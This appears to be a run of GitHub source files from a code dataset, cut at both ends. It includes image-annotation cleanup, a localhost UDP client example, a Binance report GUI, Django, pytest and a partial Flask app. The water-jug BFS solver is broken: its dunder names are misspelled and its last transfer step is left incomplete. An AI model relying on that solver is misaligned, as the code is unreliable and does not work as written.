\"stump-tailed macaque\", 23: \"red-shanked douc\", 24: \"pig-tailed macaque\",\n 25: \"sambar\", 28: \"red muntjac\"\n}\nclean_filenames = []\nclean_feature_list = []\nfor _, row in tqdm(df.iterrows()):\n image_id = row[\"image_id\"]\n\n class_id = row[\"class_id\"]\n if class_id == 15:\n continue\n x_min,y_min,x_max,y_max = row[\"x_min\"], row[\"y_min\"], row[\"x_max\"], row[\"y_max\"]\n if (class_id, x_min,y_min,x_max,y_max) in bbox_dup_check.keys():\n # print(\"Duplicate bbox: \", image_id, bbox_dup_check[(class_id, x_min,y_min,x_max,y_max)])\n c_dup_bbox += 1\n continue\n else:\n bbox_dup_check[(class_id, x_min,y_min,x_max,y_max)] = image_id\n \n if x_max - x_min <= 10:\n continue\n\n if y_max - y_min <= 10:\n continue\n\n if (x_max - x_min <= 20 or y_max - y_min <= 20) and class_id in large_class.keys():\n c_remove += 1\n continue\n filename = os.path.join(\"train/images\", str(image_id) + \".jpg\")\n feature = feature_map[filename]\n flag = False\n for old_feature, old_imageid in zip(clean_feature_list, clean_filenames):\n if image_id != old_imageid:\n if(image_id, old_imageid) not in feature_dup_check:\n if distance.cosine(feature, old_feature) <= 0.05:\n # print(\"Duplicate feature: \", image_id, old_imageid)\n c_dup_feature += 1\n feature_dup_check.add((image_id, old_imageid))\n feature_dup_check.add((old_imageid, image_id))\n flag = True\n break\n if flag == True:\n continue\n clean_filenames.append(image_id)\n clean_feature_list.append(feature_map[filename])\n if class_id > 15:\n class_id = class_id - 1\n if class_id > 11:\n class_id = class_id - 1\n class_name = row[\"class_name\"]\n\n if image_id not in image_ids.keys():\n image = cv2.imread(os.path.join(\"train/images\", image_id + \".jpg\"))\n h, w, _ = image.shape\n image_ids[image_id] = (h, w)\n else:\n h, w = image_ids[image_id]\n\n image_info = {\"id\": image_id, \"file_name\": image_id + \".jpg\", \"height\": h, \"width\": w}\n \n coco_data[\"images\"].append(image_info)\n annotation_info = {\n \"id\": index,\n \"image_id\": image_id,\n \"category_id\": class_id,\n \"bbox\": [int(x_min), int(y_min), int(x_max - x_min), int(y_max - y_min)],\n \"bbox_mode\": 1,\n \"iscrowd\": 0,\n \"area\": int(x_max - x_min)*int(y_max - y_min),\n }\n coco_data[\"annotations\"].append(annotation_info)\n index += 1\nprint(\"Total dup bbox: \", c_dup_bbox)\nprint(\"Total remove: \", c_remove)\nprint(\"Total dup feature: \", c_dup_feature)\nprint(\"Total image: \", len(coco_data[\"images\"]))\noutput_file_path = \"train_clean.json\"\nwith open(output_file_path, \"w\", encoding=\"utf-8\") as output_file:\n json.dump(coco_data, output_file, ensure_ascii=True, indent=4)","repo_name":"quanvuhust/vietteliot","sub_path":"process_data/create_coco_anno_clean.py","file_name":"create_coco_anno_clean.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72364247912","text":"import socket\n# From Black Hat Python: Python Programming for Hackers and Pentesters 1st Edition by Justin Seitz\n\ntarget_host = \"127.0.0.1\"\ntarget_port = 80\npayload = \"AAABBBCCC\"\n\n# create a socket object\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# send some data\nclient.sendto(payload.encode(),(target_host,target_port))\n\n# receive some data\ndata, addr = client.recvfrom(4096)\n\nprint(data)","repo_name":"dustinbutterworth/udpClient","sub_path":"udpClient.py","file_name":"udpClient.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72178805033","text":"################### Program Info ###################\nVERSION = \"1.3\"\nRELEASE = \"2023/11/28 19:20\"\nINFO_GUI = f\"\"\"\nVERSION\n{VERSION}\n\nRELEASE\n{RELEASE}\n\nAUTHOR\nNorbert Lipowicz\n\"\"\"\nMAIN_WINDOW = \"Binance Report Generator v\" + VERSION\n####################################################\n\n\nimport os\nimport sys\nimport json\nimport traceback\nfrom datetime import datetime\n\nimport pandas as pd\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QDateEdit\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import *\nimport icon\n\nfrom exceptions import *\nfrom const import *\nfrom nbp_api import NBPAPI\nfrom excel_writer import ExcelWriter\nfrom gui import Ui_MainWindow\nfrom binance_report import BinanceReport, get_api_keys\n\n\ndef show_msgbox(message: str, msg_type: str, **kwargs):\n \"\"\"Types: Information, Warning, Error\"\"\"\n msg = QMessageBox()\n icon = QIcon(\":Logo.png\")\n msg.setWindowIcon(icon)\n # msg.setWindowIcon(get_icon())\n if msg_type == \"Information\":\n msg.setIcon(QMessageBox.Information)\n\n if \"option_open\" in kwargs.keys():\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Open)\n msg.button(QMessageBox.Open).setText(kwargs[\"option_open\"])\n\n elif msg_type == \"Warning\":\n msg.setIcon(QMessageBox.Warning)\n msg.setStandardButtons(QMessageBox.Yes | QMessageBox.No, \"Test\")\n\n elif msg_type == \"Error\":\n msg.setIcon(QMessageBox.Critical)\n\n msg.setWindowTitle(msg_type)\n msg.setText(message)\n return msg.exec_()\n\n\ndef browse_save_file(current, caption, filter):\n path = QFileDialog.getSaveFileName(\n caption=caption,\n filter=filter\n )[0]\n return path if path != \"\" else current\n\n\ndef browse_open_file(current, caption, filter):\n path = QFileDialog.getOpenFileName(\n caption = caption, \n filter = filter\n )[0]\n return path if path != \"\" else current\n\n\ndef get_date_as_datetime(date_attr: QDateEdit):\n date = date_attr.text().split('.')\n date = [int(el) for el in date]\n return datetime(year=date[2], month=date[1], day=date[0])\n\n\nclass ThreadSignals(QObject):\n set_gui_state = pyqtSignal(bool)\n finished = pyqtSignal(str)\n error = pyqtSignal(Exception)\n progress = pyqtSignal(str)\n\n\nclass Thread(QThread):\n def __init__(self, fn, *args, **kwargs):\n super(Thread, self).__init__()\n\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = ThreadSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n # Retrieve args/kwargs here; and fire processing using them\n try:\n self.signals.set_gui_state.emit(False)\n res = self.fn(*self.args, **self.kwargs)\n self.signals.finished.emit(res)\n\n except Exception as e:\n self.signals.error.emit(e)\n\n finally:\n self.signals.set_gui_state.emit(True)\n\n\nclass BRMainWindow(Ui_MainWindow):\n def __init__(self):\n # class variables definition\n self.path_api_keys = ''\n self.path_report = ''\n self.binance_symbols = []\n self.thread: Thread = '' # placeholder\n\n self.MainWindow = QtWidgets.QMainWindow()\n self.setupUi(self.MainWindow)\n self.MainWindow.setWindowTitle(MAIN_WINDOW)\n\n icon = QIcon(':Logo.png')\n self.MainWindow.setWindowIcon(icon)\n\n self.GUI_MenuBar_ProgramInfo.triggered.connect(self.show_program_info)\n self.GUI_Button_KluczeAPI.clicked.connect(self.browse_path_api_keys)\n self.Gui_Button_LokalizacjaRaportu.clicked.connect(self.browse_path_report)\n self.GUI_MenuBar_Generuj.triggered.connect(self.generate_template_api_keys)\n self.GUI_Button_GenerujRaport.clicked.connect(self.run_program)\n self.GUI_CheckBox_Krypto.clicked.connect(self.set_crypto_choice_state)\n self.GUI_GroupBox_WyborKrypto.clicked.connect(self.set_crypto_choice_internal_state)\n self.GUI_LineEdit_Symbol.textChanged.connect(self.update_binance_symbols_list)\n self.GUI_List_Symbol.itemDoubleClicked.connect(self.add_chosen_symbol)\n self.GUI_List_SymbolChosen.itemDoubleClicked.connect(self.remove_chosen_symbol)\n\n app.aboutToQuit.connect(self.end_program)\n\n # set initial state\n self.GUI_GroupBox_Wybor.setEnabled(False)\n self.GUI_GroupBox_Daty.setEnabled(False)\n self.GUI_GroupBox_Raport.setEnabled(False)\n\n binance_report = BinanceReport()\n self.binance_symbols = binance_report.get_symbols()\n self.GUI_Label_SymbolList.setText(f\"Dostępne symbole ({len(self.binance_symbols)})\")\n self.GUI_List_Symbol.clear()\n self.GUI_List_Symbol.addItems(self.binance_symbols)\n\n\n def show_program_info(self):\n show_msgbox(INFO_GUI, \"Information\")\n \n\n def browse_path_api_keys(self):\n self.path_api_keys = browse_open_file(\n current = self.path_api_keys,\n caption = \"Wyszukaj plik kluczy API\",\n filter = \"Pliki JSON (*.json)\"\n )\n self.GUI_LineEdit_KluczeAPI.setText(self.path_api_keys)\n\n if self.path_api_keys != '':\n self.GUI_GroupBox_Wybor.setEnabled(True)\n self.GUI_GroupBox_Daty.setEnabled(True)\n self.GUI_GroupBox_Raport.setEnabled(True)\n\n\n def browse_path_report(self):\n self.path_report = browse_save_file(\n current = self.path_report,\n caption = \"Wyszukaj lokalizację raportu\",\n filter = \"Pliki Excel (*.xlsx)\"\n )\n self.GUI_LineEdit_LokalizacjaRaportu.setText(self.path_report)\n \n\n def set_crypto_choice_state(self):\n krypto_checkbox_state = self.GUI_CheckBox_Krypto.isChecked()\n self.GUI_GroupBox_WyborKrypto.setEnabled(krypto_checkbox_state)\n\n \n def set_crypto_choice_internal_state(self):\n krypto_choice_groupbox_state = self.GUI_GroupBox_WyborKrypto.isChecked()\n self.GUI_Label_Symbol.setEnabled(krypto_choice_groupbox_state)\n self.GUI_Label_SymbolList.setEnabled(krypto_choice_groupbox_state)\n self.GUI_Label_SymbolChosen.setEnabled(krypto_choice_groupbox_state)\n self.GUI_LineEdit_Symbol.setEnabled(krypto_choice_groupbox_state)\n self.GUI_List_Symbol.setEnabled(krypto_choice_groupbox_state)\n self.GUI_List_SymbolChosen.setEnabled(krypto_choice_groupbox_state)\n\n\n def update_binance_symbols_list(self):\n curr_text = self.GUI_LineEdit_Symbol.text().upper()\n symbols = [symbol for symbol in self.binance_symbols if curr_text in symbol]\n self.GUI_List_Symbol.clear()\n self.GUI_List_Symbol.addItems(symbols)\n\n\n def add_chosen_symbol(self):\n symbol = self.GUI_List_Symbol.currentItem()\n self.GUI_List_SymbolChosen.addItem(symbol.text())\n\n\n def remove_chosen_symbol(self):\n symbol = self.GUI_List_SymbolChosen.currentItem()\n row = self.GUI_List_SymbolChosen.row(symbol)\n self.GUI_List_SymbolChosen.takeItem(row)\n\n\n def get_chosen_symbols(self) -> list:\n symbols = self.GUI_List_SymbolChosen.findItems(\"*\", Qt.MatchFlag.MatchWildcard)\n return [symbol.text() for symbol in symbols]\n\n \n def generate_template_api_keys(self):\n path = ''\n path = browse_save_file(\n current = path,\n caption = \"Wyszukaj lokalizację dla szablonu pliku kluczy API\",\n filter = \"Pliki JSON (*.json)\"\n )\n if path != '':\n with open(path, 'w') as f:\n f.write(\"\"\"{\\n\\t\"api_key\": \"tutaj_wklej_klucz_publiczny\",\\n\\t\"secret_key\": \"tutaj_wklej_klucz_prywatny\"\\n}\"\"\")\n result = show_msgbox(\"Zapisano szablon pliku kluczy API\", \"Information\", option_open = \"Otwórz plik\")\n if result == QMessageBox.Open:\n os.startfile(path)\n\n\n def generate_report(self, progress_callback = None):\n start_date = get_date_as_datetime(self.GUI_Date_Start)\n end_date = get_date_as_datetime(self.GUI_Date_End)\n\n if self.path_api_keys == '':\n raise PathError(\"Podaj lokalizację pliku kluczy API\")\n \n try:\n api_key, secret_key = get_api_keys(self.path_api_keys)\n except json.decoder.JSONDecodeError as e:\n raise APIKeysError(f\"Wykryto błąd w składni pliku JSON z kluczami API\\n{e}\")\n \n if end_date <= start_date:\n raise DateError(\"Błędny zakres dat\")\n\n if self.path_report == '':\n raise PathError(\"Podaj lokalizację do zapisu raportu\")\n \n chosen_symbols = None\n if self.GUI_GroupBox_WyborKrypto.isChecked() and self.GUI_GroupBox_WyborKrypto.isEnabled():\n chosen_symbols = self.get_chosen_symbols()\n if len(chosen_symbols) == 0:\n raise SymbolsError(\"Wybierz symbole lub odznacz 'Wybór krypto'\")\n \n binance_report = BinanceReport(api_key=api_key, secret_key=secret_key, progress_callback=progress_callback)\n\n output_df_dict = {}\n list_of_empty = []\n list_of_checked = []\n\n if self.GUI_CheckBox_Krypto.isChecked():\n list_of_checked.append(\"Krypto\")\n output_df_dict[\"Krypto\"] = binance_report.get_crypto_transactions(start_date, end_date, chosen_symbols)\n if len(output_df_dict[\"Krypto\"]) == 0:\n list_of_empty.append(\"Krypto\")\n \n if self.GUI_CheckBox_TransakcjeMiedzyPlatformami.isChecked():\n list_of_checked.append(\"Transakcje_miedzy_plaftormami\")\n output_df_dict[\"Transakcje_miedzy_plaftormami\"] = binance_report.get_between_platforms_transactions(start_date, end_date)\n if len(output_df_dict['Transakcje_miedzy_plaftormami']) == 0:\n list_of_empty.append(\"Transakcje_miedzy_plaftormami\")\n \n if self.GUI_CheckBox_P2P.isChecked():\n list_of_checked.append(\"P2P\")\n output_df_dict[\"P2P\"] = binance_report.get_p2p_transactions(start_date, end_date)\n if len(output_df_dict[\"P2P\"]) == 0:\n list_of_empty.append(\"P2P\")\n \n if self.GUI_CheckBox_FIATKrypto.isChecked():\n list_of_checked.append(\"FIAT_Krypto\")\n output_df_dict[\"FIAT_Krypto\"] = binance_report.get_fiat_crypto_transactions(start_date, end_date)\n if len(output_df_dict[\"FIAT_Krypto\"]) == 0:\n list_of_empty.append(\"FIAT_Krypto\")\n \n if self.GUI_CheckBox_FIAT.isChecked():\n list_of_checked.append(\"FIAT\")\n output_df_dict[\"FIAT\"] = binance_report.get_fiat_transactions(start_date, end_date)\n if len(output_df_dict[\"FIAT\"]) == 0:\n list_of_empty.append(\"FIAT\")\n \n if self.GUI_CheckBox_RaportPodatkowy.isChecked():\n list_of_checked.append(\"Raport_podatkowy\")\n\n p2p_df = binance_report.get_p2p_transactions(start_date, end_date) if not \"P2P\" in output_df_dict.keys() else output_df_dict[\"P2P\"]\n fiat_krypto_df = binance_report.get_fiat_crypto_transactions(start_date, end_date) if not \"FIAT_Krypto\" in output_df_dict.keys() else output_df_dict[\"FIAT_Krypto\"]\n fiat_df = binance_report.get_fiat_transactions(start_date, end_date) if not \"FIAT\" in output_df_dict.keys() else output_df_dict[\"FIAT\"]\n\n fiat_krypto_df = fiat_krypto_df[fiat_krypto_df[\"Rodzaj handlu\"] == \"Wpłata\"]\n\n columns = [\"Data utworzenia\", \"Ilość FIAT\", \"Prowizja\", \"FIAT\", \"Rodzaj handlu\"]\n to_concat = [el[columns] for el in [p2p_df, fiat_krypto_df, fiat_df] if len(el) > 0]\n raport_podatkowy_df = pd.concat(to_concat) if len(p2p_df) > 0 or len(fiat_krypto_df) > 0 or len(fiat_df) > 0 else pd.DataFrame()\n\n if len(raport_podatkowy_df) > 0:\n raport_podatkowy_df.sort_values(by=\"Data utworzenia\", inplace=True)\n raport_podatkowy_df['Ilość FIAT'] = raport_podatkowy_df.apply(lambda x: x['Ilość FIAT'] if x['Rodzaj handlu'] == 'Wpłata' else -1 * x['Ilość FIAT'], axis=1)\n raport_podatkowy_df['Kurs do PLN'] = raport_podatkowy_df.apply(lambda x: 1 if x['FIAT'] == 'PLN' else NBPAPI().get_mid_price(x['FIAT'], x['Data utworzenia']), axis=1)\n raport_podatkowy_df['Wartość końcowa PLN'] = (raport_podatkowy_df['Ilość FIAT'] * raport_podatkowy_df['Kurs do PLN']).round(2)\n raport_podatkowy_df['Koszt(+)/Dochód(-)'] = raport_podatkowy_df['Wartość końcowa PLN'].cumsum().round(2)\n else:\n list_of_empty.append(\"Raport_podatkowy\")\n \n output_df_dict[\"Raport_podatkowy\"] = raport_podatkowy_df\n \n if len(output_df_dict) == 0:\n raise CheckBoxError(\"Nie wybrano żadnej opcji\")\n \n end_msg = ''\n if len(list_of_empty) > 0:\n if len(list_of_empty) == len(output_df_dict.keys()):\n end_msg = Messages.TRANSACTIONS_NOT_FOUND % ', '.join(list_of_empty) + '\\n' + Messages.REPORT_NOT_GENERATED\n else:\n end_msg = Messages.TRANSACTIONS_NOT_FOUND % ', '.join(list_of_empty) + '\\n' + Messages.REPORT_GENERATED\n \n updated_output_df_dict = {}\n for key in output_df_dict.keys():\n if key not in list_of_empty and key in list_of_checked:\n updated_output_df_dict[key] = output_df_dict[key]\n\n if len(updated_output_df_dict) > 0:\n xlsx_writer = ExcelWriter(self.path_report)\n try:\n xlsx_writer.save_dataframes_to_excel(updated_output_df_dict)\n except PermissionError:\n raise FileAccessError(f\"Zapis do pliku '{self.path_report}' jest niemożliwy. Zamknij plik i spróbuj ponownie\")\n \n if end_msg == '':\n return Messages.REPORT_GENERATED\n else:\n return end_msg\n\n\n # Functions for multithreading\n def program_set_gui_state(self, state: bool):\n self.menuPlik.setEnabled(state)\n self.GUI_GroupBox_API.setEnabled(state)\n self.GUI_GroupBox_Wybor.setEnabled(state)\n self.GUI_GroupBox_Daty.setEnabled(state)\n self.GUI_GroupBox_Raport.setEnabled(state)\n self.GUI_Button_GenerujRaport.setEnabled(state)\n\n\n def program_finished(self, res: str | None):\n self.GUI_Label_Progress.setText('')\n\n if Messages.REPORT_GENERATED in res:\n result = show_msgbox(res, \"Information\", option_open = \"Otwórz plik\")\n if result == QMessageBox.Open:\n os.startfile(self.path_report)\n else:\n result = show_msgbox(res, \"Information\")\n \n\n def program_error(self, e):\n self.GUI_Label_Progress.setText('')\n if issubclass(type(e), BinanceReportException):\n show_msgbox(f\"Rodzaj błędu:\\n{type(e).__name__}\\n\\nOpis błędu:\\n{e}\", msg_type=\"Error\")\n else:\n err_desc = traceback.format_exception(e)\n show_msgbox(f\"Wystąpił nieobsługiwany błąd. Skontaktuj się z autorem.\\n\\nOpis błędu:\\n{''.join(err_desc)}\", msg_type=\"Error\")\n\n\n def program_update_progress(self, text):\n self.GUI_Label_Progress.setText(text)\n \n\n def run_program(self):\n self.thread = Thread(self.generate_report)\n self.thread.signals.set_gui_state.connect(self.program_set_gui_state)\n self.thread.signals.progress.connect(self.program_update_progress)\n self.thread.signals.error.connect(self.program_error)\n self.thread.signals.finished.connect(self.program_finished)\n self.thread.start()\n \n\n def end_program(self):\n if type(self.thread) == Thread:\n self.thread.exit()\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ui = BRMainWindow()\n ui.MainWindow.show()\n sys.exit(app.exec_())","repo_name":"Lipovitsch/binance_report","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24906456448","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"animal\", \"0012_endpoint_effect_subtype\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"endpoint\",\n name=\"observation_time_units\",\n field=models.PositiveSmallIntegerField(\n default=0,\n choices=[\n (0, b\"not-reported\"),\n (1, b\"seconds\"),\n (2, b\"minutes\"),\n (3, b\"hours\"),\n (4, b\"days\"),\n (5, b\"weeks\"),\n (6, b\"months\"),\n (9, b\"years\"),\n (7, b\"PND\"),\n (8, b\"GD\"),\n ],\n ),\n ),\n ]\n","repo_name":"shapiromatron/hawc","sub_path":"hawc/apps/animal/migrations/0013_auto_20150924_1045.py","file_name":"0013_auto_20150924_1045.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"4213168587","text":"from collections import deque\n\nclass Pair:\n def _init_(self, j1, j2, path=[]):\n self.j1 = j1\n self.j2 = j2\n self.path = path + [(j1, j2)]\n\ndef getPathIfPossible(jug1, jug2, target):\n visited = [[False] * (jug2 + 1) for _ in range(jug1 + 1)]\n queue = deque()\n\n # Initial State: Both Jugs are empty so,\n # initialise j1 j2 as 0 and put it in the path list\n initialState = Pair(0, 0)\n queue.append(initialState)\n\n while queue:\n curr = queue.popleft()\n\n # Skip already visited states and overflowing water states\n if curr.j1 > jug1 or curr.j2 > jug2 or visited[curr.j1][curr.j2]:\n continue\n # mark current jugs state as visited\n visited[curr.j1][curr.j2] = True\n\n # Check if current state has already reached the target amount of water or not\n if curr.j1 == target or curr.j2 == target:\n if curr.j1 == target:\n # If in our current state, jug1 holds the required amount of water, then we\n # empty the jug2 and push it into our path.\n curr.path.append((curr.j1, 0))\n else:\n # else, If in our current state, jug2 holds the required amount of water,\n # then we empty the jug1 and push it into our path.\n curr.path.append((0, curr.j2))\n\n print(\"Path of states of jugs followed is :\")\n for state in curr.path:\n print(f\"{state[0]}, {state[1]}\")\n return\n\n # If we have not yet found the target, then we have three cases left\n # I. Fill the jug and Empty the other\n # II. Fill the jug and let the other remain untouched\n # III. Empty the jug and let the other remain untouched\n # IV. Transfer amounts from one jug to another\n\n # Please refer to the table attached above to understand the cases that we are taking into consideration\n\n # Now,\n # I. Fill the jug and Empty the other\n queue.append(Pair(jug1, 0, curr.path))\n queue.append(Pair(0, jug2, curr.path))\n\n # II. Fill the jug and let the other remain untouched\n queue.append(Pair(jug1, curr.j2, curr.path))\n queue.append(Pair(curr.j1, jug2, curr.path))\n\n # III. Empty the jug and let the other remain untouched\n queue.append(Pair(0, curr.j2, curr.path))\n queue.append(Pair(curr.j1, 0, curr.path))\n\n # IV. Transfer water from one to another until one jug becomes empty or until one jug\n # becomes full in this process\n\n # Transferring water form jug1 to jug2\n emptyJug = jug2 - curr.j2\n amountTransferred = min(curr.j1, emptyJug)\n j2 = curr.j2 + amountTransferred\n j1 = curr.j1 - amountTransferred\n queue.append(Pair(j1, j2, curr.path))\n\n # Transferring water form jug2 to jug1\n emptyJug = jug1 - curr.j1\n amountTransferred\nif _name_ == '_main_':\n \n Jug1, Jug2, target = 5 , 3 , 4\n print(\"Path from initial state \"\n \"to solution state ::\")\n \n getPathIfPossible(Jug1, Jug2, target)","repo_name":"yadav-Simran/AI-Algorithms","sub_path":"waterjug.py","file_name":"waterjug.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19742291196","text":"# test_setup.py\nimport glob\n\nimport pytest\n\nfrom hordelib.comfy_horde import Comfy_Horde\n\n\nclass TestSetup:\n NUMBER_OF_PIPELINES = len(glob.glob(\"hordelib/pipelines/*.json\"))\n comfy: Comfy_Horde\n\n @pytest.fixture(autouse=True)\n def setup_and_teardown(self):\n self.comfy = Comfy_Horde()\n yield\n del self.comfy\n\n def test_load_pipelines(self):\n loaded = self.comfy._load_pipelines()\n assert loaded == TestSetup.NUMBER_OF_PIPELINES\n # Check the built in pipelines\n assert \"stable_diffusion\" in self.comfy.pipelines\n assert \"stable_diffusion_hires_fix\" in self.comfy.pipelines\n assert \"image_upscale\" in self.comfy.pipelines\n assert \"stable_diffusion_paint\" in self.comfy.pipelines\n assert \"controlnet\" in self.comfy.pipelines\n\n def test_load_invalid_pipeline(self):\n loaded = self.comfy._load_pipeline(\"no-such-pipeline\")\n assert loaded is None\n\n def test_load_custom_nodes(self):\n self.comfy._load_custom_nodes()\n\n # Look for our nodes in the ComfyUI nodes list\n import execution\n\n assert \"HordeCheckpointLoader\" in execution.nodes.NODE_CLASS_MAPPINGS\n assert \"HordeImageOutput\" in execution.nodes.NODE_CLASS_MAPPINGS\n assert \"HordeImageLoader\" in execution.nodes.NODE_CLASS_MAPPINGS\n\n def test_parameter_injection(self):\n test_dict = {\n \"a\": {\n \"inputs\": {\"b\": False},\n },\n \"c\": {\"inputs\": {\"d\": {\"e\": False, \"f\": False}}},\n }\n\n params = {\n \"a.b\": True,\n \"c.d.e\": True,\n \"c.inputs.d.f\": True,\n \"unknown.parameter\": False,\n }\n self.comfy._set(test_dict, **params)\n assert test_dict[\"a\"][\"inputs\"][\"b\"]\n assert test_dict[\"c\"][\"inputs\"][\"d\"][\"e\"]\n assert test_dict[\"c\"][\"inputs\"][\"d\"][\"f\"]\n assert \"unknown.parameter\" not in test_dict\n\n def test_fix_pipeline_types(self):\n data = {\n \"node1\": {\"class_type\": \"ShouldNotBeReplaced\"},\n \"node2\": {\"no_class\": \"NoClassType\"},\n \"node3-should-be-replaced\": {\"class_type\": \"CheckpointLoaderSimple\"},\n }\n data = self.comfy._fix_pipeline_types(data)\n\n assert data[\"node1\"][\"class_type\"] == \"ShouldNotBeReplaced\"\n assert data[\"node2\"][\"no_class\"] == \"NoClassType\"\n assert data[\"node3-should-be-replaced\"][\"class_type\"] == \"HordeCheckpointLoader\"\n\n def test_fix_node_names(self):\n # basically we are expecting a search and replace of \"1\" with the \"title\" of id 1, etc.\n data = {\n \"1\": {\n \"inputs\": {\n \"input1\": [\"2\", 0],\n \"input2\": [\"3\", 0],\n \"input3\": \"foo\",\n \"input4\": 33,\n \"input5\": None,\n },\n },\n \"2\": {\n \"inputs\": {\n \"input1\": [\"3\", 0],\n \"input2\": [\"1\", 0],\n \"input3\": \"foo\",\n \"input4\": 33,\n \"input5\": None,\n },\n },\n \"3\": {\n \"inputs\": {\n \"input1\": [\"2\", 0],\n \"input2\": [\"1\", 0],\n \"input3\": \"foo\",\n \"input4\": 33,\n \"input5\": None,\n },\n },\n }\n design = {\n \"nodes\": [\n {\"id\": 1, \"title\": \"Node1\"},\n {\"id\": 2, \"title\": \"Node2\"},\n {\"id\": 3, \"no_title\": \"Node3\"},\n ],\n }\n data = self.comfy._fix_node_names(data, design)\n\n assert \"Node1\" in data\n assert data[\"Node1\"][\"inputs\"][\"input1\"][0] == \"Node2\"\n assert data[\"Node1\"][\"inputs\"][\"input2\"][0] == \"3\"\n assert \"Node2\" in data\n assert data[\"Node2\"][\"inputs\"][\"input1\"][0] == \"3\"\n assert data[\"Node2\"][\"inputs\"][\"input2\"][0] == \"Node1\"\n assert \"3\" in data\n assert data[\"3\"][\"inputs\"][\"input1\"][0] == \"Node2\"\n assert data[\"3\"][\"inputs\"][\"input2\"][0] == \"Node1\"\n\n def test_input_reconnection(self):\n # Can we reconnect the latent_image input of the sampler from the\n # empty_latent_image to the vae_encoder? And in the process\n # disconnect any existing connection that is already there?\n data = {\n \"sampler\": {\n \"inputs\": {\n \"seed\": 760767020359210,\n \"steps\": 20,\n \"cfg\": 8.0,\n \"sampler_name\": \"euler\",\n \"scheduler\": \"normal\",\n \"denoise\": 1.0,\n \"model\": [\"model_loader\", 0],\n \"positive\": [\"prompt\", 0],\n \"negative\": [\"negative_prompt\", 0],\n \"latent_image\": [\"empty_latent_image\", 0],\n },\n \"class_type\": \"KSampler\",\n },\n \"vae_encoder\": {\n \"inputs\": {\"pixels\": [\"image_loader\", 0], \"vae\": [\"model_loader\", 2]},\n \"class_type\": \"VAEEncode\",\n },\n \"empty_latent_image\": {\n \"inputs\": {\"width\": 512, \"height\": 512, \"batch_size\": 1},\n \"class_type\": \"EmptyLatentImage\",\n },\n }\n result = self.comfy.reconnect_input(data, \"sampler.latent_image\", \"vae_encoder\")\n # Should be ok\n assert result\n assert data[\"sampler\"][\"inputs\"][\"latent_image\"][0] == \"vae_encoder\"\n # This is invalid\n result = self.comfy.reconnect_input(data, \"sampler.non-existant\", \"somewhere\")\n assert not result\n","repo_name":"Haidra-Org/hordelib_old","sub_path":"tests/test_comfy.py","file_name":"test_comfy.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"8032247758","text":"from django.contrib import admin\n\nfrom Betty.apps.bets.models import Bet, Event\n\n\n@admin.register(Event)\nclass EventAdmin(admin.ModelAdmin):\n list_display = ['title', 'home', 'away', 'date', 'sport_name', 'league', 'match_result']\n list_filter = ['sport_name', 'date', 'match_result']\n list_editable = ['match_result']\n\n\n@admin.register(Bet)\nclass BetAdmin(admin.ModelAdmin):\n list_display = ['event', 'selection', 'side', 'stake', 'odds', 'matched', 'has_won']\n list_filter = ['matched', 'has_won']\n list_editable = ['has_won']\n","repo_name":"pouyaashghari77/Betty365","sub_path":"Betty/apps/bets/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29738928379","text":"from flask import Flask, request, redirect, url_for, render_template\n\nfrom airtable import Airtable\n\nfrom dotenv import load_dotenv\n\nimport os\n\nimport urllib\n\nfrom urllib.request import urlopen, Request\n\nimport ast\n\nimport json\n\nfrom datetime import datetime\n\nload_dotenv()\n\napp = Flask(__name__)\n\napp.secret_key = os.getenv(\"KEY\") # Change this!\n\nusers_table = Airtable(os.getenv(\"AIRTABLE_BASE\"),\n 'Users', os.getenv(\"AIRTABLE_KEY\"))\n\n\nentry_table = Airtable(os.getenv(\"AIRTABLE_BASE\"),\n 'Entries', os.getenv(\"AIRTABLE_KEY\"))\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return render_template('home.html')\n\n\n@app.route('/checkin', methods=['GET', 'POST'])\ndef checkin():\n\n if len(users_table.search('ID Number', request.form['idNumber'])) == 0:\n return render_template('moreinfo.html', idNumber=request.form['idNumber'], storeID=request.form['storeID'])\n\n userID = users_table.search('ID Number', request.form['idNumber'])[0][\"fields\"][\"User ID\"]\n record = entry_table.match(\"Related Main Field\", userID, sort='-Entrance Time')\n \n if record != {}:\n \n if record[\"fields\"][\"Exit Time Forced\"] == 1:\n \n entry_table.update_by_field('Entry Record ID', record[\"fields\"][\"Entry Record ID\"], {'Exit Time': str(datetime.now())})\n \n contacts = entry_table.get_all(filterByFormula=\"AND(OR(\" +\n 'AND(IS_AFTER({Entrance Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_BEFORE({Entrance Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_AFTER({Exit Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_BEFORE({Exit Time},\"' +\n 